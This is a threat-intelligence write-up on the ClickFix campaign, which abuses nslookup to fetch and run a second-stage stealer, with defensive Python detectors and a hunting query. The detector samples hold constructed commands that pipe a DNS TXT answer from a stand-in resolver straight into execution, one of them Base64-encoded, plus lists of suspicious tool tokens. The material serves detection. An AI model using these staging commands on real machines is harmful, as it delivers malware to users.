Microsoft Warns of ClickFix Attack: Sophisticated DNS Lookup Abuse Targets Windows Systems


Executive Summary

Microsoft has published an advisory on a ClickFix social engineering campaign that uses DNS lookups as a covert delivery channel for malware. The campaign is notable for its abuse of the built-in Windows utility nslookup to fetch a second-stage payload from an attacker-controlled DNS server, sidestepping the URL- and download-based controls that catch conventional stagers. It depends entirely on user interaction: victims are tricked into pasting and running a command, typically under the pretext of fixing a technical problem or completing a CAPTCHA. The chain ends in the deployment of malware such as Lumma Stealer, ModeloRAT and, on macOS, Atomic macOS Stealer (AMOS), with targeting observed across multiple sectors and countries. This report covers the technical chain, the threat actors involved, observed exploitation, victimology, and mitigations.

Threat Actor Profile

Microsoft attributes ClickFix campaigns to several financially motivated groups, among them Storm-1607, Storm-0426, Storm-0249, and GrayBravo (TAG-150); the Storm-#### designations are Microsoft's temporary names for activity clusters still under development. These actors adopt new social engineering techniques quickly and draw on commodity malware ecosystems rather than bespoke tooling. GrayBravo has been linked to the distribution of CastleLoader and Lumma Stealer, while Storm-1607 and Storm-0426 have run widespread phishing campaigns against North America and Europe. The groups maintain reasonable operational security, rotating infrastructure and payloads frequently and hiding behind legitimate cloud and content delivery services. ClickFix-style toolkits are advertised on Russian-speaking cybercriminal forums, which indicates the technique has been commoditized and will not stay confined to these groups.

Technical Analysis of Malware/TTPs

The ClickFix chain abuses DNS as a delivery channel for its second stage and relies on the victim to start execution. The initial vector is a phishing email, malvertising, or a compromised website that redirects to a fake landing page, often imitating a Cloudflare verification page or a government portal. The page instructs the user to paste a command into the Windows Run dialog, Command Prompt, or PowerShell. That command runs nslookup with a hardcoded external DNS server as the explicit resolver, so the query never passes through the organization's own resolvers and escapes local DNS filtering and logging.

The DNS response carries the encoded or obfuscated second stage, which the chained command decodes and executes without ever writing a downloaded file. In the observed chain this stage downloads a ZIP archive from attacker-controlled infrastructure (for example azwsappdev[.]com) containing a Python script that performs system reconnaissance and drops a VBScript. The VBScript launches the primary malware, such as ModeloRAT or Lumma Stealer, and establishes persistence with an LNK shortcut in the Startup folder.

The malware uses Living-off-the-Land Binaries (LOLBins) such as powershell.exe, mshta.exe, and rundll32.exe for fileless execution, and obfuscates its commands with Base64 encoding, string concatenation, and escape characters. Fetching the stage over DNS rather than HTTP keeps it out of sight of proxies, URL filters and download inspection, and the hardcoded resolver keeps it out of the organization's DNS logs as well, so network controls that only watch web traffic never see the stage arrive.

MITRE ATT&CK techniques observed include:
  • T1566.001 Phishing: Spearphishing Attachment
  • T1566.002 Phishing: Spearphishing Link
  • T1204.002 User Execution: Malicious File, and T1204.004 User Execution: Malicious Copy and Paste for the pasted command itself
  • T1071.004 Application Layer Protocol: DNS
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1105 Ingress Tool Transfer
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1218 System Binary Proxy Execution (mshta.exe, rundll32.exe)
  • T1027 Obfuscated Files or Information
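As an added example (not code from Microsoft's advisory or from Rescana), the following Python detector applies the chain described above to process-creation telemetry: it parses the nslookup invocation for a query type and an explicit resolver, decodes a PowerShell -EncodedCommand so the lookup cannot hide inside Base64, and checks the resolver against an allowlist, which is the same control the DNS-filtering advice later on this page relies on. It assumes the stage is fetched with a TXT query (the advisory describes only a DNS response); the resolver allowlist, the domains, the RFC 5737 addresses and the four sample events are all constructed.

```python
"""Added example, not code from Microsoft's advisory or from Rescana: flag
ClickFix-style nslookup staging in process-creation telemetry.

Assumptions (not from the page): the stage is fetched with a TXT query, the
organization runs the resolvers in APPROVED_RESOLVERS, and the events, domains
and RFC 5737 addresses below are constructed for the demo.
"""
import base64
import ipaddress
import re

APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}          # constructed allowlist

# Tokens showing the DNS answer is being fed straight into an interpreter.
CHAIN_MARKERS = ("for /f", "|", "iex", "invoke-expression", "cmd /c",
                 "powershell", "mshta", "^")

NSLOOKUP_RE = re.compile(r'''nslookup(?:\.exe)?\s+([^'"|&^)]+)''', re.IGNORECASE)
TXT_RE = re.compile(r"-(?:type|q|querytype)=txt", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                    re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a PowerShell -EncodedCommand (Base64 of UTF-16LE), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def parse_nslookup(text: str):
    """Return (is_txt_query, target, server) for the first nslookup call, else None.

    nslookup syntax is: nslookup [-opt ...] host [server]. A second positional
    argument is the explicit resolver that ClickFix uses to skip local DNS."""
    m = NSLOOKUP_RE.search(text)
    if m is None:
        return None
    positional = [a for a in m.group(1).split() if not a.startswith("-")]
    target = positional[0] if positional else ""
    server = positional[1] if len(positional) > 1 else ""
    return bool(TXT_RE.search(m.group(0))), target, server


def resolver_is_foreign(server: str) -> bool:
    """True when the lookup names a resolver that is not one of ours."""
    if not server:
        return False                      # default resolver: nothing bypassed
    try:
        return str(ipaddress.ip_address(server)) not in APPROVED_RESOLVERS
    except ValueError:
        return True                       # resolver given by hostname: unusual


def analyze(event: dict) -> dict:
    """Score one process-creation event; verdict is True for ClickFix-like chains."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    text = f"{cmdline} {decoded}"         # inspect the decoded payload as well
    indicators = []
    parsed = parse_nslookup(text)
    if parsed is not None:
        is_txt, _target, server = parsed
        if is_txt:
            indicators.append("txt_query")
        if resolver_is_foreign(server):
            indicators.append(f"foreign_resolver:{server}")
        low = text.lower()
        if any(mark in low for mark in CHAIN_MARKERS):
            indicators.append("chained_execution")
        if event.get("parent", "").lower() == "explorer.exe":
            indicators.append("launched_from_shell")   # Run dialog / Explorer
        if decoded:
            indicators.append("encoded_command")
    verdict = "txt_query" in indicators and len(indicators) >= 3
    return {"id": event["id"], "verdict": verdict, "indicators": indicators}


def hunt(events: list) -> list:
    """Return the analysis record for every event that trips the verdict."""
    return [r for r in (analyze(e) for e in events) if r["verdict"]]


# Constructed sample telemetry (parent process, image, command line).
ENCODED_STAGE = base64.b64encode(
    "iex (nslookup -type=txt a.example.test 198.51.100.7 | select-string text)"
    .encode("utf-16-le")).decode()

EVENTS = [
    {"id": "evt-1", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": 'cmd /c "for /f "tokens=*" %a in '
                "('nslookup -type=txt verify.example.test 203.0.113.10') do %a\""},
    {"id": "evt-2", "parent": "cmd.exe", "image": "nslookup.exe",
     "cmdline": "nslookup www.example.com"},
    {"id": "evt-3", "parent": "powershell.exe", "image": "nslookup.exe",
     "cmdline": "nslookup -type=txt example.com 10.0.0.53"},
    {"id": "evt-4", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell -nop -w hidden -enc {ENCODED_STAGE}"},
]

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit["id"], ", ".join(hit["indicators"]))
```

The verdict threshold (a TXT query plus two further indicators) is a hunting starting point, not a blocking rule: an administrator piping a TXT lookup against an external resolver through findstr scores the same as a stager, which is exactly where the resolver allowlist earns its keep. evt-3 shows the intended negative, a TXT lookup against an approved resolver with nothing chained after it.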

Exploitation in the Wild

ClickFix has been in active use since it emerged in early 2024, and its use has grown sharply since. Payloads observed include Lumma Stealer, ModeloRAT, Lampion, XWorm, AsyncRAT, NetSupport RAT, SectopRAT, Latrodectus, MintsLoader, the r77 rootkit, and Atomic macOS Stealer (AMOS). Loaders such as CastleLoader and RenEngine Loader frequently sit between the pasted command and the final payload.

Campaigns have used fake government, tax, and social security sites (e.g., access-ssa-gov[.]es), malvertising on streaming and pirated-content platforms, and Discord-themed lures. The technique has been ported to macOS, where AMOS is delivered with the same social engineering and a Terminal command in place of the Run dialog. Microsoft has tracked multiple campaigns by Storm-1607, Storm-0426, and Storm-0249, with infrastructure and payloads changing rapidly to evade detection.

Victimology and Targeting

Victims span government, financial services, education, transportation, and general enterprise environments. End-user devices are the primary exposure because the chain depends on user interaction. Campaigns have targeted the United States, Canada, Germany, Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, India, Spain, Brazil, Romania, and Italy, and the localized lures and language-specific phishing content show deliberate regional targeting. Both individuals and organizations have been hit; the goals are credential theft, data exfiltration, and initial access that is sold on or used for ransomware deployment.

Mitigation and Countermeasures

To defend against ClickFix and similar DNS-abusing social engineering attacks, organizations need controls at several layers. Block known indicators of compromise (IOCs) at the network perimeter and in endpoint security tooling, but do not rely on them: the infrastructure rotates quickly. Monitor the Run dialog's history key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) for pasted commands and watch for anomalous use of LOLBins such as powershell.exe, mshta.exe, and rundll32.exe, particularly when their parent is explorer.exe. Remove the Run dialog (Win+R) via Group Policy for users who do not need it. Constrain PowerShell with AppLocker or WDAC rather than with the execution policy, which is a safety feature rather than a security boundary and is bypassed with a single -ExecutionPolicy Bypass argument; enable script block logging and module logging separately so that the commands victims paste are recorded even when they run.

Use Microsoft Defender SmartScreen and network protection to block known malicious domains and URLs. Train users never to paste commands from websites or pop-ups into the Run dialog or a terminal; no legitimate CAPTCHA or error fix asks for that. Keep endpoint protection current and make sure behavioral detection is enabled, since signatures lag behind the payload rotation. Hunt proactively with queries such as the following, which surfaces Run-dialog history entries that reference interpreters or download utilities:

    DeviceRegistryEvents
    | where ActionType =~ "RegistryValueSet"
    | where InitiatingProcessFileName =~ "explorer.exe"
    | where RegistryKey has @"\CurrentVersion\Explorer\RunMRU"
    | where RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
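The query above needs Defender for Endpoint telemetry. For hosts without it, the same history can be recovered offline from the RunMRU key: the Run dialog stores each command as a string ending in a literal \1 marker, and the MRUList value orders the slot letters most recent first. The following Python is an added example, not from the advisory or from Rescana: it parses a reg export of that key and flags entries containing the same tokens as the query, plus nslookup and for /f. The export text is constructed.

```python
"""Added example, not from Microsoft's advisory or from Rescana: rebuild the
Run-dialog history from an exported RunMRU key for hosts without EDR telemetry.

The export below is constructed (the shape of a reg export of this key); the
token list mirrors the hunting query on this page plus nslookup and for /f.
"""
import re

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
SUSPICIOUS_TOKENS = ("powershell", "mshta", "curl", "msiexec", "^",
                     "nslookup", "for /f")

# One "name"="data" line per value; data may contain \" and \\ escapes.
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>(?:[^"\\]|\\.)*)"$')

SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="cmd /c \"for /f %a in ('nslookup -type=txt verify.example.test 203.0.113.10') do %a\"\\1"
"c"="\\\\fileserver\\share\\1"
"MRUList"="bca"
'''


def unescape_reg(data: str) -> str:
    """Undo the .reg escapes for backslash and double quote."""
    return re.sub(r"\\(.)", r"\1", data)


def strip_marker(value: str) -> str:
    """RunMRU stores each command followed by a literal backslash-1 marker."""
    return value[:-2] if value.endswith("\\1") else value


def parse_runmru(export_text: str) -> list:
    """Return Run-dialog entries, most recent first, each with its matched tokens."""
    in_key, values = False, {}
    for line in export_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.strip("[]").lower() == RUNMRU_KEY.lower()
            continue
        m = VALUE_RE.match(line) if in_key else None
        if m:
            values[m.group("name")] = unescape_reg(m.group("data"))
    order = values.pop("MRUList", "")      # slot letters, most recent first
    entries = []
    for rank, slot in enumerate(order):
        if slot not in values:
            continue                       # MRUList can name a deleted slot
        command = strip_marker(values[slot])
        hits = [t for t in SUSPICIOUS_TOKENS if t in command.lower()]
        entries.append({"rank": rank, "slot": slot, "command": command, "hits": hits})
    return entries


def flagged(entries: list) -> list:
    """Only the entries that matched at least one suspicious token."""
    return [e for e in entries if e["hits"]]


if __name__ == "__main__":
    for e in flagged(parse_runmru(SAMPLE_EXPORT)):
        print(f"#{e['rank']} [{e['slot']}] {e['command']}  <- {', '.join(e['hits'])}")
```

reg export writes UTF-16 with a byte-order mark, so open the file with encoding="utf-16" before passing its text to parse_runmru. Entries without hits still matter during an investigation: the innocuous command immediately before a flagged one often shows what the victim was trying to do when the lure appeared, and the MRU order gives that sequence without timestamps.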

Restrict outbound DNS at the host firewall and the network edge so that endpoints can reach only the organization's own resolvers (block UDP/TCP 53, and known DoH/DoT endpoints, to anywhere else). That single control defeats the hardcoded-resolver step of this chain and turns any attempt into a logged, blocked connection. Pair it with resolver-side filtering that alerts on unusual record types and unusually long or high-entropy answers. Finally, harden endpoints with AppLocker or WDAC and PowerShell constrained language mode to limit which built-in utilities an unprivileged user can chain together for command execution and payload delivery.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats. For more information or to discuss how Rescana can enhance your cyber resilience, we are happy to answer questions at ops@rescana.com.
